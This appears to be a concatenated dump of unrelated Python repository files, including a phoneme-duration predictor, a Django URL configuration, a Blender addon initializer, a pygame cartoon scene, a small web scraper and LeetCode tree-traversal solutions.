test_mean_list = [ 1 for x in rate_list if x <= stat_dict[elem][0]]
test_dict[elem] = len(test_mean_list)/len(rate_list)
return test_dict
# Create a list of durations and a list of word durations from the training data
def dur_vs_rate(training_dict):
duration_list = []
rate_list = []
for el in training_dict.keys():
duration_list += training_dict[el][::2]
rate_list += training_dict[el][1::2]
return duration_list, rate_list
#duration_list, rate_list = dur_vs_rate(read_training_files())
# Returns a list with predicted durations for the phonemes of the test set.
# Predicted durations come from the observed durations in the training set (mean and SD), and
# from the official mean statistics of Verbmobil, for phonemes, which don't occur in the training set.
# @param testfile_list: the list returned by read_testfiles()
# Looks like: ["a", 583, 0.5, "b", 12, 0.78, "a", 489, 0.12, ...]
# @param stat_dict: dictionary giving the mean and the SD for each phoneme
# NO: the full dictionary built from the training data
# NO: Looks like {a: [1452, 0.8, 799, 0.5], b : [655, 0.5, 799, 0.45]...}
def create_prediction_list(testfile_list, stat_dict):
phone_list = testfile_list[::3]
vowels = ["a:", "e:", "E:", "i:", "o:", "u:", "y:", "2:", "a~:", "a", "e", "E", "i", "o", "u", "y", "2", "a~", "@", "9"]
#print(phone_list)
#mini = min(testfile_list[1::3])
lsr_list = testfile_list[2::3]  # local speech rates; referenced below, so this must not stay commented out
prediction_list = []
#off_dict = official_stats()
#print(len(lsr_list))
#print(len(phone_list))
#print(phone_list)
#prediction_list = [ training_dict.get(el, o_dict[el]) for el in phone_list ]
#prediction_list = [ training_dict.get(el, omedian_dict[el]) for el in phone_list ]
i = 0
for phone in phone_list:
#print(i)
#print(phone)
# prediction_list = testfile_list[2::3]
if phone in stat_dict.keys():
# prediction_list.append(mini + (stat_dict[phone][0]-mini)*lsr_list[i]) # Klatt
# prediction_list.append(mini + stat_dict[phone][1]*lsr_list[i]) # Klatt with SD instead of the difference
# prediction_list.append(mini + stat_dict[phone][1]/3*lsr_list[i]) # Klatt with SD / 3
# prediction_list.append(stat_dict[phone][0]) # just mean per phoneme
if lsr_list[i] <= 0.45:
prediction_list.append(stat_dict[phone][0] - stat_dict[phone][1]/3) # mean +/- sigma/3
elif lsr_list[i] >= 0.65:
prediction_list.append(stat_dict[phone][0] + stat_dict[phone][1]/3)
else:
prediction_list.append(stat_dict[phone][0]) # mid-range rate: fall back to the mean so the list stays aligned with phone_list
# if phone in vowels: # split for using SR instead of mean based on relation mean - SR
# if test_mean(read_training_files(), stat_dict)[phone] >= 0.8:
# prediction_list.append(testfile_list[i*3+2] + ((stat_dict[phone][1]/3)))
# elif test_mean(read_training_files(), stat_dict)[phone] <= 0.45:
# prediction_list.append(testfile_list[i*3+2] - ((stat_dict[phone][1]/3)))
# else:
# prediction_list.append(testfile_list[i*3+2])
# else:
# prediction_list.append(stat_dict[phone][0])
# else:
# prediction_list.append(mini + (off_dict[phone][0]-mini)*lsr_list[i]) # Klatt with official values
# prediction_list.append(mini + off_dict[phone][1]*lsr_list[i]) # Klatt with SD instead of the difference
# prediction_list.append(mini + off_dict[phone][1]/3*lsr_list[i]) # Klatt with SD / 3
# prediction_list.append(off_dict[phone][0]) # mean / phoneme (from official values)
#
# if lsr_list[i] <= 0.45:
# prediction_list.append(off_dict[phone][0] - (off_dict[phone][1]/3))
# elif lsr_list[i] >= 0.65:
# prediction_list.append(off_dict[phone][0] + (off_dict[phone][1]/3))
# else:
# prediction_list.append(off_dict[phone][0])
i += 1
return prediction_list
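# A minimal end-to-end sketch (assuming the Training/Test folders and the
# speech_rate module are available as configured above):
# training_dict = read_training_files()
# stats = phone_stats(training_dict)
# predictions = create_prediction_list(read_testfiles(), stats)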
|
[
"12krah@cloak.mafiasi.de"
] |
12krah@cloak.mafiasi.de
|
ee74da074651806b44affe44236d16dd446b60fb
|
404d32aa69b477af742aa6af5498d6568791e6e5
|
/Week 14/Ex5.py
|
56b488a4b48620462e70c00e04c2d05cd87a7b25
|
[] |
no_license
|
Koemsak/Week14_Python
|
214922dc1df8e80da5ff1158ceb6722f06f690a2
|
3c65a3fe25d71104647e1a2a4f7a2d9c147226d2
|
refs/heads/main
| 2023-01-04T04:03:41.681676
| 2020-11-10T02:01:39
| 2020-11-10T02:01:39
| 311,516,684
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 223
|
py
|
# Read a 2D list of numbers; note that eval() trusts its input.
array = eval(input())
nbRows = len(array)
nbCol = len(array[0])
result = []
for index in range(nbCol):
total = 0  # avoid shadowing the built-in sum()
for row in range(nbRows):
total += array[row][index]
result.append(total)
print(result)
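# Worked example: for the input [[1, 2], [3, 4]] the column sums are
# [1 + 3, 2 + 4], so the program prints [4, 6].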
|
[
"noreply@github.com"
] |
Koemsak.noreply@github.com
|
32865d3fdead909edcc3650051f3912fc2e64079
|
1dd4e2905085ace304446f5fc3ccade67f8b6e26
|
/spider/gzip_deflate/__init__.py
|
b03fb41ce64b77186364474b35223ce484f2a69c
|
[] |
no_license
|
ZhouBoXiao/SpiderDemo
|
f76b192f7dd5323de379a7e43f3fcf392a5cb086
|
137c40c895ad025236a13be9645d12e8973d5ff2
|
refs/heads/master
| 2021-01-19T05:23:51.152778
| 2017-04-06T13:18:30
| 2017-04-06T13:18:30
| 87,430,701
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 79
|
py
|
# -*- coding:utf-8 -*-
# E:/PycharmProjects/
# create by boxiao on 2016/12/29
|
[
"1533880208@qq.com"
] |
1533880208@qq.com
|
4692a97be5655bafc7b9444570fcddb2c65deec0
|
543c7d3f8d5c36830c85784c6f9b694dfa82088b
|
/epic_events/epic_events/epic_events/urls.py
|
34a359eb7d4c8b05116ec7316ca499351d6093ee
|
[] |
no_license
|
pandavaurien/Openclassroom_projet_12
|
3959294ffd422a9abc3924e29b08255f227b3416
|
8d4772286fedb8d4989906b51d44e66e296fc459
|
refs/heads/master
| 2023-08-30T03:38:15.772621
| 2021-11-16T09:48:17
| 2021-11-16T09:48:17
| 417,076,693
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,485
|
py
|
"""epic_events URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from rest_framework.routers import SimpleRouter
from clients.views import ClientViewSet
from events.views import EventViewSet
from contracts.views import ContractViewSet
from rest_framework_simplejwt.views import (
TokenObtainPairView,
TokenRefreshView,
)
router = SimpleRouter()
router.register(r'clients', ClientViewSet, basename='clients')
router.register(r'contracts', ContractViewSet, basename="contracts")
router.register(r'events', EventViewSet, basename='events')
urlpatterns = [
path('admin/', admin.site.urls),
path('login/', TokenObtainPairView.as_view(), name='login'),
path('api/token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),
path('api-auth/', include('rest_framework.urls')),
path(r'', include(router.urls)),
]
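# With SimpleRouter, each registration above yields list and detail routes,
# e.g. GET/POST /clients/ and GET/PUT/PATCH/DELETE /clients/{pk}/ (and the
# same pattern for /contracts/ and /events/).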
|
[
"a.jurquet@gmail.com"
] |
a.jurquet@gmail.com
|
6867238cab9e0a5e21c60e60b01bb5571a43e0be
|
eec4d938713409db8f6127456bc77dd69749e7f7
|
/todo/tasks/migrations/0001_initial.py
|
e2337bffb0cf977ca00020268561d4f4d74ae938
|
[] |
no_license
|
shreyasingh12/TODO-APP
|
e5d65c65c94c2b14c171134746a5b70014bd7197
|
0950a55e5328763b6831977f40be7f2bde801b8c
|
refs/heads/master
| 2022-09-16T07:45:08.835197
| 2020-05-27T07:01:42
| 2020-05-27T07:01:42
| 267,244,318
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 621
|
py
|
# Generated by Django 3.0.5 on 2020-05-09 16:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('complete', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
],
),
]
|
[
"sshreya0003@gmail.com"
] |
sshreya0003@gmail.com
|
6b1dedb0d9049ca2347fb1df6006b27379b97dc8
|
965c1c4cf64374e5ea4bd0d2c08f9fb8ac4bdc45
|
/artige_product_pages/users/apps.py
|
0c4c72c9811ecdd92343c90f8ea550b624cfb339
|
[
"MIT"
] |
permissive
|
alinik/artige_product_pages
|
48e790bf09442229e5f40aa4a79227243d87d35f
|
f98a7b6fc07cf71c3ada6e2c50534421f84b5883
|
refs/heads/master
| 2021-10-28T12:14:05.142387
| 2019-04-05T16:37:44
| 2019-04-05T16:37:44
| 177,163,393
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 263
|
py
|
from django.apps import AppConfig
class UsersAppConfig(AppConfig):
name = "artige_product_pages.users"
verbose_name = "Users"
def ready(self):
try:
import users.signals # noqa F401
except ImportError:
pass
|
[
"ali@nikneshan.com"
] |
ali@nikneshan.com
|
37b532102a0518ee4b69422056e3d8f4bd0c067e
|
d1d345e065ec120775663759d6c906c22aa776f9
|
/pytest_homework3/test_hook.py
|
cedf82c062b1ad71d21ea16d5d23b5138f300594
|
[] |
no_license
|
Clown136/jiusheng_project
|
253e98cbcf65d81f4e054aba1ca3d153ff92c475
|
4d513d6a1a15e28854e1ba6dca4b56d42b366473
|
refs/heads/master
| 2022-12-28T01:31:25.040883
| 2020-09-22T10:15:53
| 2020-09-22T10:15:53
| 283,638,439
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
py
|
def test_case(cmdoption):
print(f"env环境下读取的值为:", cmdoption)
def test_case1(cmdoption1):
print(f"env环境下读取的值为:", cmdoption1)
def test_case2(cmdoption2):
print(f"env环境下读取的值为:", cmdoption2)
|
[
"1363643890@qq.com"
] |
1363643890@qq.com
|
6d656693f400eb644f9e1c446f6736d6fa7a27ac
|
9cc392b30ea3c74bc190c994ede882eee6d59813
|
/animation_nodes/__init__.py
|
028d09157141ea2e9648c1ec7084a796f5d60633
|
[] |
no_license
|
BitByte01/myblendercontrib
|
621f5df293d11d14a749fd1405170a355efab8ea
|
45f96e8195dae1b1ec72b3094c735fab12cfbd87
|
refs/heads/master
| 2020-12-25T21:00:53.487662
| 2015-04-07T08:53:22
| 2015-04-07T08:53:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,244
|
py
|
'''
Copyright (C) 2014 Jacques Lucke
mail@jlucke.com
Created by Jacques Lucke
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import importlib, sys, os
from nodeitems_utils import register_node_categories, unregister_node_categories
import nodeitems_utils
from bpy.types import NodeTree, Node, NodeSocket
from fnmatch import fnmatch
from bpy.props import *
bl_info = {
"name": "Animation Nodes",
"description": "Node system for more flexible animations.",
"author": "Jacques Lucke",
"version": (0, 0, 1),
"blender": (2, 7, 2),
"location": "Node Editor",
"category": "Animation",
"warning": "alpha"
}
# import all modules in same/subdirectories
###########################################
currentPath = os.path.dirname(__file__)
if __name__ != "animation_nodes":
sys.modules["animation_nodes"] = sys.modules[__name__]
def getAllImportFiles():
"""
Should return full python import path to module as
animation_nodes.nodes.mesh.mn_mesh_polygon_info
animation_nodes.sockets.mn_float_socket
"""
def get_path(base):
b, t = os.path.split(base)
if __name__ == t:
return ["animation_nodes"]
else:
return get_path(b) + [t]
for root, dirs, files in os.walk(currentPath):
path = ".".join(get_path(root))
for f in filter(lambda f:f.endswith(".py"), files):
name = f[:-3]
if not name == "__init__":
yield path + "." + name
animation_nodes_modules = []
for name in getAllImportFiles():
mod = importlib.import_module(name)
animation_nodes_modules.append(mod)
reload_event = "bpy" in locals()
import bpy
from animation_nodes.mn_execution import nodeTreeChanged
class GlobalUpdateSettings(bpy.types.PropertyGroup):
frameChange = BoolProperty(default = True, name = "Frame Change")
sceneUpdate = BoolProperty(default = True, name = "Scene Update")
propertyChange = BoolProperty(default = True, name = "Property Change")
treeChange = BoolProperty(default = True, name = "Tree Change")
skipFramesAmount = IntProperty(default = 0, name = "Skip Frames", min = 0, soft_max = 10)
redrawViewport = BoolProperty(default = True, name = "Redraw Viewport", description = "Redraw the UI after each execution. Turning it off gives a better performance but worse realtime feedback.")
class DeveloperSettings(bpy.types.PropertyGroup):
printUpdateTime = BoolProperty(default = False, name = "Print Global Update Time")
printGenerationTime = BoolProperty(default = False, name = "Print Script Generation Time")
executionProfiling = BoolProperty(default = False, name = "Node Execution Profiling", update = nodeTreeChanged)
import animation_nodes.mn_keyframes
class Keyframes(bpy.types.PropertyGroup):
name = StringProperty(default = "", name = "Keyframe Name")
type = EnumProperty(items = mn_keyframes.getKeyframeTypeItems(), name = "Keyframe Type")
class KeyframesSettings(bpy.types.PropertyGroup):
keys = CollectionProperty(type = Keyframes, name = "Keyframes")
selectedPath = StringProperty(default = "", name = "Selected Path")
selectedName = EnumProperty(items = mn_keyframes.getKeyframeNameItems, name = "Keyframe Name")
newName = StringProperty(default = "", name = "Name")
selectedType = EnumProperty(items = mn_keyframes.getKeyframeTypeItems(), name = "Keyframe Type")
class AnimationNodesSettings(bpy.types.PropertyGroup):
update = PointerProperty(type = GlobalUpdateSettings, name = "Update Settings")
developer = PointerProperty(type = DeveloperSettings, name = "Developer Settings")
keyframes = PointerProperty(type = KeyframesSettings, name = "Keyframes")
# Reload
# makes F8 reload actually reload the code
if reload_event:
for module in animation_nodes_modules:
importlib.reload(module)
# register
##################################
def register():
# two calls are needed:
# one registers the classes defined in this file,
# the other registers everything that lives in the fake
# 'animation_nodes' namespace.
bpy.utils.register_module(__name__)
bpy.utils.register_module("animation_nodes")
categories = mn_node_register.getNodeCategories()
# if we use F8 reload this happens.
if "ANIMATIONNODES" in nodeitems_utils._node_categories:
unregister_node_categories("ANIMATIONNODES")
register_node_categories("ANIMATIONNODES", categories)
bpy.types.Scene.mn_settings = PointerProperty(type = AnimationNodesSettings, name = "Animation Node Settings")
print("Loaded Animation Nodes with {} modules".format(len(animation_nodes_modules)))
def unregister():
bpy.utils.unregister_module(__name__)
bpy.utils.unregister_module("animation_nodes")
unregister_node_categories("ANIMATIONNODES")
if __name__ == "__main__":
register()
|
[
"Develop@Shaneware.Biz"
] |
Develop@Shaneware.Biz
|
a22814d087c6bd23f7827d8cb60915dcdb39e13f
|
5f88f96aaad8c97cbdadefa3fc5ba5e6afea4c42
|
/modAux.py
|
fcb2ac1a4294e09c416acbc71715909ffe1652c1
|
[
"MIT"
] |
permissive
|
AbeJLazaro/reconocimientoGatos
|
e7c04a4723d5d0fa5ec005e1189c8c7d90cffbd5
|
63f5a969d41e23dd7c596b2d8ffa1f6723e9685e
|
refs/heads/main
| 2023-03-04T04:58:34.769999
| 2021-02-18T08:56:06
| 2021-02-18T08:56:06
| 339,949,355
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,021
|
py
|
'''
Author: Lázaro Martínez Abraham Josué
Date: February 17, 2021
Title: modAux.py
'''
import numpy as np
import matplotlib.pyplot as plt
import h5py
def load_data():
train_dataset = h5py.File('datos/train_catvnoncat.h5', "r")
train_set_x_orig = np.array(train_dataset["train_set_x"][:]) # your train set features
train_set_y_orig = np.array(train_dataset["train_set_y"][:]) # your train set labels
test_dataset = h5py.File('datos/test_catvnoncat.h5', "r")
test_set_x_orig = np.array(test_dataset["test_set_x"][:]) # your test set features
test_set_y_orig = np.array(test_dataset["test_set_y"][:]) # your test set labels
classes = np.array(test_dataset["list_classes"][:]) # the list of classes
train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))
return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes
if __name__ == '__main__':
load_data()
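# A minimal usage sketch (assuming the .h5 files exist under datos/):
# train_x, train_y, test_x, test_y, classes = load_data()
# print(train_x.shape, train_y.shape)  # e.g. (209, 64, 64, 3) (1, 209) for the classic cat dataset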
|
[
"abrahamlazaro@comunidad.unam.mx"
] |
abrahamlazaro@comunidad.unam.mx
|
4789a773ce161e6f302d1d3c00c355334c59bb1e
|
bc82526544eb82fad2fa2c40a6651b15c39d7eba
|
/pepe.py
|
d617e14ddc98d9df31ad82a596c8d725b0f314fe
|
[] |
no_license
|
river-sneed/pepe
|
6aeb55b92312c07ef54e1c245a84b5faee9da477
|
3a0f9b33b5b43f6445e1c2aaeef3b51fa3263a75
|
refs/heads/master
| 2020-07-15T18:05:34.887703
| 2016-12-02T20:43:27
| 2016-12-02T20:43:27
| 73,960,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,055
|
py
|
# Computer Programming 1
# Unit 11 - Graphics
#
# A scene that uses pepes to be lit.
#River Sneed
#11/28/2016
# Imports
import pygame
import random
import math
print ("press keys and leave them toggled until you see fit to do otherwise")
print("f = rainbow fun")
print("space = lit")
print ("s = smoke")
print ("make sure you have clicked on game window to be able to be able to use it")
# Initialize game engine
pygame.init()
# Window
SIZE = (800, 600)
TITLE = "pepe"
screen = pygame.display.set_mode(SIZE)
pygame.display.set_caption(TITLE)
# Timer
clock = pygame.time.Clock()
refresh_rate = 30
# Colors
SKY = (135, 206, 250)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
ORANGE = (255, 125, 0)
YELLOW = (255, 255, 0)
SWEET_PEPE_GREEN = (104, 152, 76 )
SWEET_PEPE_BLUE = ( 35, 74, 252 )
SWEET_PEPE_RED = ( 169, 106, 64 )
RAINBOW_YELLOW = (255, 255, 0)
RAINBOW_BLUE = (0, 0, 255)
PURPLE = (83, 33, 158)
SMOKE = (81, 90, 104)
HAZE = (167, 171, 178)
MOON = (227, 223, 242)
def draw_pepe(x, y):
pygame.draw.ellipse(screen, SWEET_PEPE_BLUE, [x-10, y+40, 65, 40])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x-2, y+15, 75, 40])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+5, y+1, 38, 50])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+25, y+1, 38, 50])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+20, y+7, 50, 17])
pygame.draw.rect(screen, SWEET_PEPE_RED, [x+22.5, y+37.5, 48.5, 7.5])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+19, y+37.5, 7.5, 7.5])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+65.5, y+37.5, 10.0, 3.7])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+65.5, y+41.5, 7.5, 3.7])
pygame.draw.ellipse(screen, WHITE, [x+45, y+11, 25, 9])
#pygame.draw.ellipse(screen, BLACK, [x+45, y+11, 25, 9], 3)
pygame.draw.ellipse(screen, WHITE, [x+20, y+11, 20, 9])
#pygame.draw.ellipse(screen, BLACK, [x+20, y+11, 20, 9], 3)
pygame.draw.ellipse(screen, BLACK, [x+25, y+11.5, 7.5, 7.5])
pygame.draw.ellipse(screen, BLACK, [x+52, y+11.5, 7.5, 7.5])
def draw_pepe_red(x, y):
pygame.draw.ellipse(screen, SWEET_PEPE_BLUE, [x-10, y+40, 65, 40])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x-2, y+15, 75, 40])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+5, y+1, 38, 50])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+25, y+1, 38, 50])
pygame.draw.ellipse(screen, SWEET_PEPE_GREEN, [x+20, y+7, 50, 17])
pygame.draw.rect(screen, SWEET_PEPE_RED, [x+22.5, y+37.5, 48.5, 7.5])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+19, y+37.5, 7.5, 7.5])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+65.5, y+37.5, 10.0, 3.7])
pygame.draw.ellipse(screen, SWEET_PEPE_RED, [x+65.5, y+41.5, 7.5, 3.7])
pygame.draw.ellipse(screen, WHITE, [x+45, y+11, 25, 9])
pygame.draw.ellipse(screen, RED, [x+45, y+11, 25, 9], 3)
pygame.draw.ellipse(screen, WHITE, [x+20, y+11, 20, 9])
pygame.draw.ellipse(screen, RED, [x+20, y+11, 20, 9], 3)
pygame.draw.ellipse(screen, BLACK, [x+25, y+11.5, 7.5, 7.5])
pygame.draw.ellipse(screen, BLACK, [x+52, y+11.5, 7.5, 7.5])
pygame.draw.ellipse(screen, WHITE, [x+45, y+39.5, 7.5, 7.5])
pygame.draw.rect(screen, WHITE, [x+47, y+39.5, 40, 6])
pygame.draw.ellipse(screen, RED, [x+83, y+39.5, 7.5, 7.5])
pygame.draw.ellipse(screen, YELLOW, [x+83, y+39.5, 7.5, 7.5], 1)
def draw_smoke(x, y):
pygame.draw.ellipse(screen, SMOKE, [x, y, 13, 13])
def draw_sun(x,y):
pygame.draw.ellipse(screen, YELLOW, [575, 75, 100, 100])
def draw_moon(x,y):
pygame.draw.ellipse(screen, MOON, [575, 75, 100, 100])
''' make pepes '''
pepes = []
for i in range(42):
x = random.randrange(-100, 1600)
y = random.randrange(0,250)
pepes.append([x, y])
'''Make smoke'''
smoke = []
front_smoke = []
for i in range(200):
x = random.randint(0, 1000)
y = random.randint(-50,0)
smoke.append([x, y])
for i in range(150):
x = random.randint(0,1000)
y = random.randint(-30, 0)
front_smoke.append([x, y])
boring = True
daytime = True
lights_on = True
fence = True
# Game loop
done = False
while not done:
# Event processing
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_SPACE:
boring = not boring
elif event.key == pygame.K_s:
daytime = not daytime
elif event.key == pygame.K_f:
fence = not fence
# Game logic
''' move pepes '''
for p in pepes:
p[0] -= 1
if p[0] < -100:
p[0] = random.randrange(800, 1600)
p[1] = random.randrange(0, 200)
for s in smoke:
s[1] -= 3
if s[1] > 0:
s[0] += math.sqrt(s[1])/10
if s[1] < 0:
s[0] = random.randrange(-50, 800)
s[1] = random.randrange(410, 700)
for f in front_smoke:
f[1]-= 5
if f[1] > 0:
f[0] += math.sqrt(f[1])/random.randint(10, 20)
if f[1] < 0:
f[0] = random.randrange(-50, 800)
f[1] = random.randrange(410, 700)
''' set sky color (sun/moon are drawn in the drawing section, after screen.fill) '''
if daytime:
sky = SKY
else:
sky = HAZE
''' set window color (if there was a house)'''
if lights_on:
window_color = YELLOW
else:
window_color = WHITE
# Drawing code
''' sky '''
screen.fill(sky)
''' sun '''
if daytime:
draw_sun(x,y)
else:
draw_moon(x,y)
if daytime:
pygame.draw.ellipse(screen, ORANGE, [-50, 200, 800, 1000], 10)
pygame.draw.ellipse(screen, RED, [-15, 190, 730, 800], 10)
pygame.draw.ellipse(screen, RAINBOW_YELLOW, [-7, 210, 715, 790], 10)
pygame.draw.ellipse(screen, GREEN, [-10, 220, 720, 810], 10)
pygame.draw.ellipse(screen, RAINBOW_BLUE, [-10, 230, 715, 815], 10)
pygame.draw.ellipse(screen, PURPLE, [-7, 240, 710, 810], 10)
else:
pass
''' pepes '''
for p in pepes:
x = p[0]
y = p[1]
if boring:
draw_pepe(x,y)
else:
draw_pepe_red(x,y)
''' smoke '''
for s in smoke:
if not daytime:
draw_smoke(s[0], s[1])
'''front smoke'''
for f in front_smoke:
if not daytime:
draw_smoke(f[0], f[1])
''' grass '''
pygame.draw.rect(screen, GREEN, [0, 400, 800, 200])
''' fence '''
y = 380
if fence:
for x in range(5, 800, 30):
pygame.draw.polygon(screen, WHITE, [[x+5, y], [x+10, y+5],
[x+10, y+40], [x, y+40],
[x, y+5]])
pygame.draw.line(screen, WHITE, [0, 390], [800, 390], 5)
pygame.draw.line(screen, WHITE, [0, 410], [800, 410], 5)
else:
for x in range(5, 800, 30):
pygame.draw.polygon(screen, RED, [[x, y], [x+5, y], [x, y+50], [x-5, y+50]])
pygame.draw.polygon(screen, ORANGE, [[x+5, y], [x+10, y], [x+5, y+50], [x, y+50]])
pygame.draw.polygon(screen, YELLOW, [[x+10, y], [x+15, y], [x+10, y+50], [x+5, y+50]])
pygame.draw.polygon(screen, GREEN, [[x+15, y], [x+20, y], [x+15, y+50], [x+10, y+50]])
pygame.draw.polygon(screen, BLUE, [[x+20, y], [x+25, y], [x+20, y+50], [x+15, y+50]])
pygame.draw.polygon(screen, PURPLE, [[x+25, y], [x+30, y], [x+25, y+50], [x+20, y+50]])
# Update screen
pygame.display.flip()
clock.tick(refresh_rate)
# Close window on quit
pygame.quit()
|
[
"noreply@github.com"
] |
river-sneed.noreply@github.com
|
ea7cf35b3c3783e32f505ac43d141170881c8250
|
33524b5c049f934ce27fbf046db95799ac003385
|
/2017/Turtule/lesson_1/fun.py
|
1a4171a3456c99abd720076e765828f9e7a6a3e9
|
[] |
no_license
|
mgbo/My_Exercise
|
07b5f696d383b3b160262c5978ad645b46244b70
|
53fb175836717493e2c813ecb45c5d5e9d28dd23
|
refs/heads/master
| 2022-12-24T14:11:02.271443
| 2020-10-04T04:44:38
| 2020-10-04T04:44:38
| 291,413,440
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 256
|
py
|
import turtle
def square(t):
x=75
ang=90
t.forward(x)
t.left(ang)
t.forward(x)
t.left(ang)
t.forward(x)
t.left(ang)
t.forward(x)
#t.left(ang)
t=turtle.Turtle()
t.shape("turtle")
square(t)
t.right(90)
square(t)
turtle.mainloop()
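# Equivalent loop form (a sketch; this version also restores the turtle's
# heading with a final left turn):
# def square(t):
#     for _ in range(4):
#         t.forward(75)
#         t.left(90)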
|
[
"mgbo433@gmail.com"
] |
mgbo433@gmail.com
|
c9ecfb211964d9eb944233d0119dcaab7410f68e
|
93e533204f4c1bcb60e30db5de4d02fb9bce0a19
|
/test/pa_shebeilianjie.py
|
e47572ba64e72152b97a08f4f59ad7144f9976dc
|
[] |
no_license
|
overoptimus/pythonTest
|
21b1feb8c6dbdfe2b0e118d14a2d62f1b6e22def
|
79cb1016ab2d72149246908c9ef99ef280bd7a3c
|
refs/heads/master
| 2021-07-25T10:01:12.281732
| 2020-05-07T08:09:52
| 2020-05-07T08:09:52
| 165,030,777
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 503
|
py
|
import requests
from bs4 import BeautifulSoup
url = 'http://oa.zycg.cn/td_xxlcpxygh/platform'
req = requests.get(url)
req.encoding = 'utf-8'
soup = BeautifulSoup(req.text, 'html.parser')
# print(soup.prettify())
tds = soup.find_all('td', attrs={'class': 'grade3',
'valign': 'top', 'align': 'left'})
a_s = tds[11].find_all('a')  # index 11: the specific table cell that holds the links of interest on this page
with open('./urls.txt', 'w') as f:
for a in a_s:
f.write('http://oa.zycg.cn/' + a['href'] + '\n')
# a = a.find('a')
# print(a)
|
[
"1040570917@qq.com"
] |
1040570917@qq.com
|
ac26165098ea44d820dd16e971045dc0d37cdccc
|
92754bb891a128687f3fbc48a312aded752b6bcd
|
/Algorithms/Python3.x/145-Binary_Tree_Postorder_Traversal.py
|
8d1c7f402c7e9e4772c4b22aa6d41afe45ecd87f
|
[] |
no_license
|
daidai21/Leetcode
|
ddecaf0ffbc66604a464c3c9751f35f3abe5e7e5
|
eb726b3411ed11e2bd00fee02dc41b77f35f2632
|
refs/heads/master
| 2023-03-24T21:13:31.128127
| 2023-03-08T16:11:43
| 2023-03-08T16:11:43
| 167,968,602
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,606
|
py
|
# recursoin
# Runtime: 36 ms, faster than 74.54% of Python3 online submissions for Binary Tree Postorder Traversal.
# Memory Usage: 13.9 MB, less than 5.72% of Python3 online submissions for Binary Tree Postorder Traversal.
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def postorderTraversal(self, root: TreeNode) -> List[int]:
self.postorder = []
self.recursion(root)
return self.postorder
def recursion(self, node):
if not node:
return
if node.left:
self.recursion(node.left)
if node.right:
self.recursion(node.right)
if node.val is not None:
self.postorder.append(node.val)
# Runtime: 36 ms, faster than 74.54% of Python3 online submissions for Binary Tree Postorder Traversal.
# Memory Usage: 13.7 MB, less than 5.72% of Python3 online submissions for Binary Tree Postorder Traversal.
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def postorderTraversal(self, root: TreeNode) -> List[int]:
# Iterative: traverse root-right-left, then reverse to get the
# left-right-root (postorder) sequence.
postorder = []
stack = [root]
while stack:
node = stack.pop()
if node:
postorder.append(node.val)
stack.append(node.left)
stack.append(node.right)
return postorder[::-1]  # reversed() would return an iterator, not a List[int]
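# Quick sanity check (a sketch, assuming a TreeNode class as in the stub above):
# root = TreeNode(1); root.right = TreeNode(2); root.right.left = TreeNode(3)
# Solution().postorderTraversal(root)  # -> [3, 2, 1]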
|
[
"daidai4269@aliyun.com"
] |
daidai4269@aliyun.com
|
9853f6870c6412e85cf8eb0bcdc4f330947b2f99
|
90c8fc381673d77cfa3725fd94964ae276c4978a
|
/opt_graph.py
|
